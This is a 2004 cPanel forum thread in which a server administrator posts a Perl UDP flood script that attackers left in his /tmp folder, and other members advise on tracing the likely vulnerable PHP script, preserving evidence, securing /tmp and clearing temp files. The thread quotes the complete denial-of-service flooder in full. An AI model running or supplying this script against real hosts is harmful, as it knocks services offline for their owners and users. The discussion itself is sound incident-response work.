Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Script in tmp made by Hacker

Discussion in 'General Discussion' started by jeroman8, Dec 14, 2004.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    166
    I had a script made by a hacking team called UMHCreW in my TMP folder.
    Anyone know what it is ?

    Is it ok to remove/delete ALL files in the tmp folder or will this
    screw something up ?
    I have old files and a lot of folders and crazy files in there.

    Here's the script...


    #!/usr/bin/perl
    #####################################################
    # Simple but agressive udp flood.
    #
    # gr33ts: Amaz1ng^ RUBIN1,Caffeine,cyberboki, etc.
    #
    # lemurian from UMHCreW @ eu.undernet.org #deadworld
    ######################################################

    use Socket;

    $ARGC=@ARGV;

    if ($ARGC !=3) {
    printf "UMHCreW 2004\n";
    printf "$0 <ip> <port> <time>\n";
    printf "if arg1/2 =0, randports/continous packets.\n";
    exit(1);
    }

    my ($ip,$port,$size,$time);
    $ip=$ARGV[0];
    $port=$ARGV[1];
    $time=$ARGV[2];

    socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

    printf "Simpe but Agressive udp flood - lemurian@UMHCreW\n";

    if ($ARGV[1] ==0 && $ARGV[2] ==0) {
    goto randpackets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto packets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] ==0) {
    goto packets;
    }
    if ($ARGV[1] ==0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto randpackets;
    }

    packets:
    for (;;) {
    $size=$rand x $rand x $rand;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }

    randpackets:
    for (;;) {
    $size=$rand x $rand x $rand;
    $port=int(rand 65000) +1;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Well, that's just the symptoms of a problem. What are is the ownership of that file? If it's nobody:nobody, then you have a vulnerable PHP script on your server and you need to track it down and either fix or remove it. If it's owned by a user, you can then suspend their account while you investigate further. You should also make sure that the script is not actually running on your server (i.e. look for it having open ports) and then definitely move it somewhere safe. Simply deleting it first before investigating further is not necessarily the best thing to do. Moving it, or tar'ing it up and preserving the ownership should be first.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. GOT

    GOT Get Proactive!
    PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,015
    Likes Received:
    34
    Trophy Points:
    178
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Good advice for sure chirpy.

    Also make sure that you secure your /tmp directory (/scripts/securetmp is the easiest method.)
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    166
    yes it's nobody that owns the file

    How can I track which php script does this ?
    Just some basic stuff so I can go from there would be nice :)
     
  5. GOT

    GOT Get Proactive!
    PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,015
    Likes Received:
    34
    Trophy Points:
    178
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Short of running php as suexec you'll really not be able to track it down, save for seaching every php file and even that may not turn it up.

    You cannot prevent php from writing to the /tmp directory, so what you need to do is make it so that people cannot execute programs from there. Remove access to compilers. Security for your server needs to be taken very seriously (not saying that you are not) and you should either spend some time reading up on how to secure your linux server, or contract it to one of the several reputable server admins hanging around.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    166
    Thank you!

    Is it ok to delete all old tmp files ?
    They are just there right, leftovers...
     
  7. GOT

    GOT Get Proactive!
    PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,015
    Likes Received:
    34
    Trophy Points:
    178
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Yes, it is generally safe to delete them. In some cases if you are running Fantastico, it might cause a decoder error.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  8. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Make sure that you don't delete the mysql lock file.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice